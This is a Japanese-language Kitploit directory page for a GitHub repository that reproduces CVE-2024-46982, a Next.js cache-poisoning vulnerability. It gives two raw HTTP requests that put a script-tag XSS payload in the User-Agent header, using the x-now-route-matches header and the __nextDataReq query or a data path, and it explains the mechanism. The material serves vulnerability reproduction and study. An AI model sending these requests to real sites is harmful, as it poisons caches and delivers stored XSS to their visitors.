Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-46982-Reproduction — CVE-2024-46982 の再現 | Kitploit
ツール/GitHubGitHub/samuel871211/cve-2024-46982-reproduction
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティ
GitHubsamuel871211/cve-2024-46982-reproduction

CVE-2024-46982-Reproduction

CVE-2024-46982 の再現

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
47ヶ月前未レビュー
共有

はじめに

  1. Node.js LTS をインストールする
  2. npm install
  3. npm run build
  4. npm run start

悪用方法1: キャッシュポイズニングによる格納型XSS

  1. 任意のHTTPクライアントを使用して、次のHTTPリクエスト(攻撃リクエスト)を送信します。
root@kitploit:~
GET /poc?__nextDataReq=1 HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1


CVE-2024-46982-attack 2. 任意のWebブラウザを使用して、http://localhost:3000(通常リクエスト)にアクセスします。 CVE-2024-46982-normal

悪用方法2: キャッシュポイズニングによる格納型XSS

  1. 任意のHTTPクライアントを使用して、次のHTTPリクエスト(攻撃リクエスト)を送信します。"UiKoKFFGnF1td3mMyeDX5" を自分の ".next/BUILD_ID" に置き換えることを確認してください。 CVE-2024-46982-build-id
root@kitploit:~
GET /_next/data/UiKoKFFGnF1td3mMyeDX5/poc.json HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1


CVE-2024-46982-attack-2 2. 任意のWebブラウザを使用して、http://localhost:3000(通常リクエスト)にアクセスします。 CVE-2024-46982-normal

仕組み

  1. x-now-route-matches は Next.js が認識するカスタムHTTPヘッダーです。これが存在する場合、Next.js はHTTPリクエストを「SSG」(静的サイト生成)として扱い、HTTPレスポンスをキャッシュできるようになります(Cache-Control: s-maxage=1, stale-while-revalidate)。

  2. ?__nextDataReq=1 は Next.js が認識するクエリ文字列です。これが存在する場合、Next.js はHTTPリクエストを「__NEXT_DATA__ の取得」として扱います。

詳細な解説は クレジット セクションにあります。

クレジット

  • https://zhero-web-sec.github.io/research-and-things/nextjs-cache-and-chains-the-stale-elixir
ツールをダウンロード